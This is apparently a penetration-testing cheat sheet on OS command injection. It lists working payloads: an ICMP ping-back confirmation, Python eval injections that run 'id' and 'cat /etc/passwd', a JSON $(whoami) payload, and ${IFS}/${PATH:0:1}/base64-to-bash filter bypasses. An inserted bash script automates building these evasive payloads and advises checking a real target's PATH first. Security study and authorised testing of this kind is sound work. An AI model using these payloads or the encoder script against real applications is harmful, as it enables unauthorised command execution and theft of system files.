Command Injection

Command injection is an attack whose goal is the execution of arbitrary commands on the host operating system through a vulnerable application, typically one that builds a shell command from unsanitised user input (request parameters, headers, cookies).

Wordlists

ICMP ping check

# On the attacking machine, capture ICMP on the VPN interface
sudo tcpdump -i tun0 -A icmp

# Injected payload: `;` terminates the original command, then the target pings the attacker
# (10.10.10.11 is the attacker's tun0 address here). Echo requests arriving at the listener
# confirm execution even when nothing is reflected in the response.
;ping -c 4 10.10.10.11

Check special chars

/

Various injections

# Python command injections (input lands inside a quoted string handed to eval()/exec())
# Close the string and call, run the command, comment out the remainder of the expression
') + str(__import__('os').system('id')) #
') + str(__import__('os').system('cat /etc/passwd')) #
# popen().read() returns stdout, so the output is reflected in the response
' + __import__('os').popen('id').read() + '
# system() returns an int: the command runs, but the str + int concatenation then raises TypeError (blind only)
'+__import__('os').system('id')+'

# API injection using JSON: $(...) is shell command substitution, so if the value reaches
# a shell the output of whoami replaces the placeholder (check the stored/reflected username)
{
	"username": "mczen84$(whoami)"
}

Filter bypasses

%09 # URL-encoded tab, works as an argument separator when spaces are filtered
${IFS} # Internal field separator, expands to whitespace (space, tab, newline)
${PATH:0:1} # First character of PATH, normally '/' (bash substring syntax, not POSIX sh)

# Encode the command as base64 when its characters are filtered, then decode it on the target and pipe it to a shell
echo -n 'cat /etc/passwd | grep 33' | base64
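The two substitutions above can be applied mechanically. The following bash script is an added example, not part of the original page: it rewrites a command so that it contains no literal space or slash, wraps a command in base64 for delivery, and executes both the plain and encoded forms to confirm they behave identically. It assumes the injected string is interpreted by bash on the target (the `${PATH:0:1}` substring expansion is not POSIX sh) and that `PATH` starts with `/`; the `bypass_encode`, `b64_wrap` and `same_output` function names are this example's own.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): build command-injection payloads
# that avoid literal spaces and slashes, then verify they still run as intended.
# Assumes the injected command is interpreted by bash (the ${PATH:0:1} substring
# expansion is a bash feature, not POSIX sh) and that PATH begins with '/'.

# Replace each space with ${IFS} and each '/' with ${PATH:0:1}.
bypass_encode() {
    local cmd="$1"
    local ifs='${IFS}'          # expands to " \t\n"; word splitting turns it into a separator
    local slash='${PATH:0:1}'   # first character of PATH, normally '/'
    cmd="${cmd// /$ifs}"
    cmd="${cmd//\//$slash}"
    printf '%s' "$cmd"
}

# Wrap a command in base64 so the command text itself never appears in the payload.
# Caveat: base64 output may contain '/', '+' and '=', so confirm those are not
# filtered; the rest of the payload is echo, '|', base64 -d and bash, with ${IFS}
# standing in for spaces.
b64_wrap() {
    local b64
    b64="$(printf '%s' "$1" | base64 | tr -d '\n')"
    printf 'echo${IFS}%s|base64${IFS}-d|bash' "$b64"
}

# Run the plain and encoded forms in a fresh bash and compare their output.
# Returns 0 when the outputs match, 1 otherwise.
same_output() {
    local original="$1"
    local encoded
    encoded="$(bypass_encode "$original")"
    [ "$(bash -c "$original")" = "$(bash -c "$encoded")" ]
}

# Demo: print the encoded forms for a few constructed commands (no execution here).
for c in 'cat /etc/passwd' 'id' 'ls -la /tmp'; do
    printf 'plain:   %s\nencoded: %s\nb64:     %s\n\n' \
        "$c" "$(bypass_encode "$c")" "$(b64_wrap "$c")"
done
```

Before relying on `${PATH:0:1}` against a real target, confirm the first character of its `PATH` with a harmless probe such as echoing it back, since a non-standard `PATH` would turn every slash into the wrong character.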

Injection points to check

  • Request parameters (query string, form fields, JSON/XML bodies)

  • HTTP headers (e.g. User-Agent, Referer, X-Forwarded-For)

  • Cookies
